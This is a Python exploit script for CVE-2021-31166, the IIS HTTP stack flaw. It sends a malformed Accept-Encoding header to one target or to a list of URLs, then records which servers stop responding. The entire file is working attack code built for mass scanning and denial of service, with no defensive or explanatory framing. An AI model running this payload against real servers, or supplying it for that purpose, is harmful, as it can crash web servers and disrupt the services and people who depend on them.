CVE-2021-31166.py

import sys
import requests
import argparse
from colorama import Fore, Style, init
import argparse
import socket
import ssl
import urllib3
import time


def parseArgs():
    parser = argparse.ArgumentParser(description="Description message")
    parser.add_argument("-u", "--url", default=None, required=False, help="IIS Server url. For instance: 192.168.1.110")
    parser.add_argument("-l", "--list", default=None, required=False, help="IIS Server urls list. For instance: subdomain.txt")
    parser.add_argument("-o", "--output", default=None, required=False, help="Output file to write found issues/vulnerabilities. For instance: output.txt")
    return parser.parse_args()

def isServiceRunning(url):
    targetURL = url
    try:
        requests.get(targetURL, timeout=4, verify=False)
    except Exception as e:
        return False

    return True


def checkServerStatus(url):
    if isServiceRunning(url):
        print(f'[*] The server is {Fore.GREEN}running{Style.RESET_ALL}!')
    else:
        print(f'[!] The server is {Fore.BLUE}not running{Style.RESET_ALL}!')



def exploit(url):
    try:
        if not isServiceRunning(url):
            print(f'[!] {url} is {Fore.BLUE}not running{Style.RESET_ALL}!')
            return False
        payload = requests.get(url, headers = {
        'Accept-Encoding': 'doar-e, ftw, imo, ,',
        }, verify=False)
        time.sleep(1)
        if isServiceRunning(url):
            print(f'[*] {url} is {Fore.GREEN}not vulnerable{Style.RESET_ALL}!')
        else:
            print(" ")
    except Exception as e:
        print(f'[!] {url} is {Fore.RED}vulnerable{Style.RESET_ALL}!')
        if output:
            f = open(str(output), "a")
            f.write(url+"\n")
            f.close()



if __name__ == '__main__':
    init(convert=True)

    # Args
    args = parseArgs()
    url = args.url
    url_list = args.list
    output = args.output

    # Check server status
    if url:
        urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
        exploit(url)
    elif url_list:
        file = str(url_list)
        file1 = open(file, 'r')
        Lines = file1.readlines()
        for line in Lines:
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            exploit(str(line.strip()))